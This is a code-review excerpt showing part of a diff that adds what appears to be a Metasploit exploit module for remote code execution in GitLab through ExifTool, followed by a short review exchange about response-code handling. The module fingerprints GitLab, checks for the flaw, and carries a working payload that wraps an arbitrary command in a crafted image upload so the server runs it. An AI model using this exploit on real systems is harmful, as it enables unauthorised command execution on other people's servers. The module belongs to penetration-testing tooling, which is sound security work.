modules/exploits/multi/http/gitlab_exif_rce.rb

```diff
@@ -0,0 +1,161 @@
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => random_uri,
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    }, timeout)
+  end
+
+  def check
+    # Checks if the instance is a GitLab install by looking for
+    # the 'About GitLab' footer. If that's success a bogus jpg
+    # image is uploaded to a bogus URI. The patched versions
+    # should never send the bad image to ExifTool, resulting in
+    # a 404. The unpatched versions should feed the image to
+    # the vulnerable ExifTool, resulting in a 422 error message.
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/users/sign_in'
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.body.include?('>About GitLab<')
+      return Exploit::CheckCode::Safe('Not a GitLab web interface')
+    end
+
+    res = upload_file('AAAAA')
+    unless res
+      return CheckCode::Detected('The target did not respond to the upload requests.')
+    end
+
+    case res.code
+    when 422
+      if res.body.include?('The change you requested was rejected.')
+        return CheckCode::Vulnerable('The error response indicates ExifTool was executed.')
+      end
+    when 404
+      if res.body.include?('The page could not be found')
+        return CheckCode::Safe('The error response indicates ExifTool was not run.')
+      end
+    end
+
+    return Exploit::CheckCode::Detected
+  end
+
+  def execute_command(cmd, _opts = {})
+    # header and trailer are taken from William Bowling's
+    # echo_vakzz.jpg from their original h1 disclosure. The
+    # 'cmd' variable is sandwiched in a qx{} function.
+    payload_header = Base64.decode64('QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=')
+    payload = cmd
+    payload_trailer = Base64.decode64('fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==')
+
+    res = upload_file(payload_header + payload + payload_trailer, 5)
+    if res
+      fail_with(Failure::UnexpectedReply, 'Target replied with an unexpected response')
+    else
+      print_good('Exploit successfully executed.')
+    end
```

Comment:
The HTTP response code might be useful? Also, redundant `else` after `fail_with`.

Reply:
Actually... If the code comment above is to be believed, then a 422 HTTP response should be received during successful exploitation. Where as this conditional checks `if res` which will be true in the event that a 422 is received.